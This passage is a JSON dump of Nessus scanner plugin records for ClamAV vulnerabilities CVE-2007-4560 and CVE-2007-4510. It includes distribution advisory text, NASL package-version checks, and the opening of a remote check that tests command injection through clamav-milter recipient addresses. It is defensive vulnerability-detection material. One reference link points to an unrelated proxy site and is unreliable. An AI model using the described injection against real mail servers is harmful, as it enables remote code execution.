(CVE-2007-4560). Also, NULL pointer dereference\n errors exist within the 'cli_scanrtf()' function in libclamav/rtf.c and\n Stefanos Stamatis discovered a NULL pointer dereference vulnerability\n within the 'cli_html_normalise()' function in libclamav/htmlnorm.c\n (CVE-2007-4510).\n \nImpact :\n\n The unsanitized recipient address can be exploited to execute arbitrary\n code with the privileges of the clamav-milter process by sending an\n email with a specially crafted recipient address to the affected\n system. Also, the NULL pointer dereference errors can be exploited to\n crash ClamAV. Successful exploitation of the latter vulnerability\n requires that clamav-milter is started with the 'black hole' mode\n activated, which is not enabled by default.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 24, "published": "2007-09-24T00:00:00", "title": "GLSA-200709-14 : ClamAV: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-4510", "CVE-2007-4560"], "modified": "2007-09-24T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:clamav"], "id": "GENTOO_GLSA-200709-14.NASL", "href": "https://www.tenable.com/plugins/nessus/26104", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200709-14.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(26104);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2007-4510\", \"CVE-2007-4560\");\n script_xref(name:\"GLSA\", value:\"200709-14\");\n\n script_name(english:\"GLSA-200709-14 : ClamAV: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200709-14\n(ClamAV: Multiple vulnerabilities)\n\n Nikolaos Rangos discovered a vulnerability in ClamAV which exists\n because the recipient address extracted from email messages is not\n properly sanitized before being used in a call to 'popen()' when\n executing sendmail (CVE-2007-4560). Also, NULL pointer dereference\n errors exist within the 'cli_scanrtf()' function in libclamav/rtf.c and\n Stefanos Stamatis discovered a NULL pointer dereference vulnerability\n within the 'cli_html_normalise()' function in libclamav/htmlnorm.c\n (CVE-2007-4510).\n \nImpact :\n\n The unsanitized recipient address can be exploited to execute arbitrary\n code with the privileges of the clamav-milter process by sending an\n email with a specially crafted recipient address to the affected\n system. Also, the NULL pointer dereference errors can be exploited to\n crash ClamAV. Successful exploitation of the latter vulnerability\n requires that clamav-milter is started with the 'black hole' mode\n activated, which is not enabled by default.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200709-14\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All ClamAV users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-antivirus/clamav-0.91.2'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ClamAV Milter Blackhole-Mode Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(78);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:clamav\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/09/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/09/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"app-antivirus/clamav\", unaffected:make_list(\"ge 0.91.2\"), vulnerable:make_list(\"lt 0.91.2\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ClamAV\");\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:06:05", "description": " - Sat Aug 25 2007 Enrico Scholz <enrico.scholz at\n informatik.tu-chemnitz.de> - 0.91.2-2\n\n - fixed an open(2) issue\n\n - Sat Aug 25 2007 Enrico Scholz <enrico.scholz at\n informatik.tu-chemnitz.de> - 0.91.2-1\n\n - updated to 0.91.2 (SECURITY) :\n\n - CVE-2007-4510 DOS in RTF parser\n\n - DOS in html normalizer\n\n - arbitrary command execution by special crafted\n recipients in clamav-milter's black-hole mode\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2007-11-06T00:00:00", "title": "Fedora 7 : clamav-0.91.2-2.fc7 (2007-2050)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-4510", "CVE-2007-4560"], "modified": "2007-11-06T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:7", "p-cpe:/a:fedoraproject:fedora:clamav-data-empty", "p-cpe:/a:fedoraproject:fedora:clamav-milter-sysv", "p-cpe:/a:fedoraproject:fedora:clamav-server-sysv", "p-cpe:/a:fedoraproject:fedora:clamav-data", "p-cpe:/a:fedoraproject:fedora:clamav-devel", "p-cpe:/a:fedoraproject:fedora:clamav-debuginfo", "p-cpe:/a:fedoraproject:fedora:clamav", "p-cpe:/a:fedoraproject:fedora:clamav-filesystem", "p-cpe:/a:fedoraproject:fedora:clamav-milter", "p-cpe:/a:fedoraproject:fedora:clamav-update", "p-cpe:/a:fedoraproject:fedora:clamav-server", "p-cpe:/a:fedoraproject:fedora:clamav-lib"], "id": "FEDORA_2007-2050.NASL", "href": "https://www.tenable.com/plugins/nessus/27747", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2007-2050.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(27747);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2007-4510\", \"CVE-2007-4560\");\n script_bugtraq_id(25398, 25439);\n script_xref(name:\"FEDORA\", value:\"2007-2050\");\n\n script_name(english:\"Fedora 7 : clamav-0.91.2-2.fc7 (2007-2050)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Sat Aug 25 2007 Enrico Scholz <enrico.scholz at\n informatik.tu-chemnitz.de> - 0.91.2-2\n\n - fixed an open(2) issue\n\n - Sat Aug 25 2007 Enrico Scholz <enrico.scholz at\n informatik.tu-chemnitz.de> - 0.91.2-1\n\n - updated to 0.91.2 (SECURITY) :\n\n - CVE-2007-4510 DOS in RTF parser\n\n - DOS in html normalizer\n\n - arbitrary command execution by special crafted\n recipients in clamav-milter's black-hole mode\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2007-September/003629.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fc903132\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ClamAV Milter Blackhole-Mode Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(78);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:clamav\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:clamav-data\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:clamav-data-empty\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:clamav-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:clamav-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:clamav-filesystem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:clamav-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:clamav-milter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:clamav-milter-sysv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:clamav-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:clamav-server-sysv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:clamav-update\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:7\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/09/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/11/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 7.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC7\", reference:\"clamav-0.91.2-2.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"clamav-data-0.91.2-2.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"clamav-data-empty-0.91.2-2.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"clamav-debuginfo-0.91.2-2.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"clamav-devel-0.91.2-2.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"clamav-filesystem-0.91.2-2.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"clamav-lib-0.91.2-2.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"clamav-milter-0.91.2-2.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"clamav-milter-sysv-0.91.2-2.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"clamav-server-0.91.2-2.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"clamav-server-sysv-0.91.2-2.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"clamav-update-0.91.2-2.fc7\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"clamav / clamav-data / clamav-data-empty / clamav-debuginfo / etc\");\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:44:50", "description": "Several remote vulnerabilities have been discovered in the Clam\nanti-virus toolkit. The Common Vulnerabilities and Exposures project\nidentifies the following problems :\n\n - CVE-2007-4510\n It was discovered that the RTF and RFC2397 parsers can\n be tricked into dereferencing a NULL pointer, resulting\n in denial of service.\n\n - CVE-2007-4560\n It was discovered that clamav-milter performs\n insufficient input sanitising, resulting in the\n execution of arbitrary shell commands.\n\nThe oldstable distribution (sarge) is only affected by a subset of the\nproblems. An update will be provided later.", "edition": 26, "published": "2007-09-03T00:00:00", "title": "Debian DSA-1366-1 : clamav - several vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-4510", "CVE-2007-4560"], "modified": "2007-09-03T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:4.0", "p-cpe:/a:debian:debian_linux:clamav"], "id": "DEBIAN_DSA-1366.NASL", "href": "https://www.tenable.com/plugins/nessus/25966", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1366. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(25966);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2007-4510\", \"CVE-2007-4560\");\n script_xref(name:\"DSA\", value:\"1366\");\n\n script_name(english:\"Debian DSA-1366-1 : clamav - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several remote vulnerabilities have been discovered in the Clam\nanti-virus toolkit. The Common Vulnerabilities and Exposures project\nidentifies the following problems :\n\n - CVE-2007-4510\n It was discovered that the RTF and RFC2397 parsers can\n be tricked into dereferencing a NULL pointer, resulting\n in denial of service.\n\n - CVE-2007-4560\n It was discovered that clamav-milter performs\n insufficient input sanitising, resulting in the\n execution of arbitrary shell commands.\n\nThe oldstable distribution (sarge) is only affected by a subset of the\nproblems. An update will be provided later.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-4510\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-4560\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2007/dsa-1366\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the clamav packages. \n\nFor the stable distribution (etch) these problems have been fixed in\nversion 0.90.1-3etch7.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ClamAV Milter Blackhole-Mode Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(78);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:clamav\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:4.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/09/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/09/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"4.0\", prefix:\"clamav\", reference:\"0.90.1-3etch7\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"clamav-base\", reference:\"0.90.1-3etch7\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"clamav-daemon\", reference:\"0.90.1-3etch7\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"clamav-dbg\", reference:\"0.90.1-3etch7\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"clamav-docs\", reference:\"0.90.1-3etch7\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"clamav-freshclam\", reference:\"0.90.1-3etch7\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"clamav-milter\", reference:\"0.90.1-3etch7\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"clamav-testfiles\", reference:\"0.90.1-3etch7\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libclamav-dev\", reference:\"0.90.1-3etch7\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libclamav2\", reference:\"0.90.1-3etch7\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:49:19", "description": "BugTraq reports :\n\nClamAV is prone to multiple denial-of-service vulnerabilities.\n\nA successful attack may allow an attacker to crash the application and\ndeny service to users.", "edition": 24, "published": "2007-09-24T00:00:00", "title": "FreeBSD : clamav -- multiple remote Denial of Service vulnerabilities (b6f6da57-680a-11dc-b350-001921ab2fa4)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-4510"], "modified": "2007-09-24T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:clamav"], "id": "FREEBSD_PKG_B6F6DA57680A11DCB350001921AB2FA4.NASL", "href": "https://www.tenable.com/plugins/nessus/26092", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(26092);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2007-4510\");\n script_bugtraq_id(25398);\n\n script_name(english:\"FreeBSD : clamav -- multiple remote Denial of Service vulnerabilities (b6f6da57-680a-11dc-b350-001921ab2fa4)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"BugTraq reports :\n\nClamAV is prone to multiple denial-of-service vulnerabilities.\n\nA successful attack may allow an attacker to crash the application and\ndeny service to users.\"\n );\n # https://vuxml.freebsd.org/freebsd/b6f6da57-680a-11dc-b350-001921ab2fa4.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?738172a0\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:clamav\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/08/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/09/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/09/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"clamav<0.91.2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-01T01:33:54", "description": "The remote host appears to be running a version of Clamav-milter, a\nfilter for sendmail, configured with '--black-hole-mode' that fails to\nsanitize recipient addresses of shell metacharacters before using them\nin a call to 'popen()' to determine whether to discard incoming\nmessages. An unauthenticated, remote attacker can leverage this issue\nto execute arbitrary code, typically as root.", "edition": 26, "published": "2008-01-03T00:00:00", "title": "ClamAV clamav-milter black-hole-mode Sendmail Recipient Field Arbitrary Command Execution", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-4560"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:clamav:clamav"], "id": "CLAMAV_MILTER_BLACKHOLE_CMD_EXEC.NASL", "href": "https://www.tenable.com/plugins/nessus/29830", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(29830);\n script_version(\"1.28\");\n script_cvs_date(\"Date: 2018/11/15 20:50:24\");\n\n script_cve_id(\"CVE-2007-4560\");\n script_bugtraq_id(25439);\n\n script_name(english:\"ClamAV clamav-milter black-hole-mode Sendmail Recipient Field Arbitrary Command Execution\");\n script_summary(english:\"Tries to run a command via clamav-milter\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote mail server allows execution of arbitrary commands.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host appears to be running a version of Clamav-milter, a\nfilter for sendmail, configured with '--black-hole-mode' that fails to\nsanitize recipient addresses of shell metacharacters before using them\nin a call to 'popen()' to determine whether to discard incoming\nmessages. An unauthenticated, remote attacker can leverage this issue\nto execute arbitrary code, typically as root.\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://piratebay-proxies.com/best-internet-security/\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/477723/100/0/threaded\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2007/Dec/518\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ClamAV 0.91.2 or later.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ClamAV Milter Blackhole-Mode Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(78);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2008/01/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2007/08/24\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2007/08/24\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:clamav:clamav\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"SMTP problems\");\n script_copyright(english:\"This script is Copyright (C) 2008-2018 Tenable Network Security, Inc.\");\n script_dependencies(\"smtpserver_detect.nasl\", \"os_fingerprint.nasl\");\n script_require_ports(\"Services/smtp\", 25);\n script_require_keys(\"Settings/ThoroughTests\");\n 